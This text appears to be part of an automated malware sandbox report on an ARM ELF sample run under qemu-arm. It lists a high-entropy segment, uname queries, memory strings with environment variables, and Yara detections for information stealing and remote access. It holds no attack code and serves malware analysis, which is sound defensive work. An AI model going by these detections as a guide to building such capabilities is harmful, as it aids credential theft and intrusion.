Source: 5OGAx17mRN.elf Submission file: segment LOAD with 7.9704 entropy (max. 8.0)
Source: /tmp/5OGAx17mRN.elf (PID: 5808) Queries kernel information via 'uname': Jump to behavior
Source: 5OGAx17mRN.elf, 5808.1.00005618872e4000.0000561887452000.rw-.sdmp, 5OGAx17mRN.elf, 5810.1.00005618872e4000.0000561887452000.rw-.sdmp, 5OGAx17mRN.elf, 5815.1.00005618872e4000.0000561887452000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: 5OGAx17mRN.elf, 5808.1.00007ffd3ade4000.00007ffd3ae05000.rw-.sdmp, 5OGAx17mRN.elf, 5810.1.00007ffd3ade4000.00007ffd3ae05000.rw-.sdmp, 5OGAx17mRN.elf, 5815.1.00007ffd3ade4000.00007ffd3ae05000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: 5OGAx17mRN.elf, 5808.1.00005618872e4000.0000561887452000.rw-.sdmp, 5OGAx17mRN.elf, 5810.1.00005618872e4000.0000561887452000.rw-.sdmp, 5OGAx17mRN.elf, 5815.1.00005618872e4000.0000561887452000.rw-.sdmp Binary or memory string: V!/etc/qemu-binfmt/arm
Source: 5OGAx17mRN.elf, 5808.1.00007ffd3ade4000.00007ffd3ae05000.rw-.sdmp, 5OGAx17mRN.elf, 5810.1.00007ffd3ade4000.00007ffd3ae05000.rw-.sdmp, 5OGAx17mRN.elf, 5815.1.00007ffd3ade4000.00007ffd3ae05000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/5OGAx17mRN.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/5OGAx17mRN.elf

Stealing of Sensitive Information

barindex
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality

barindex
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs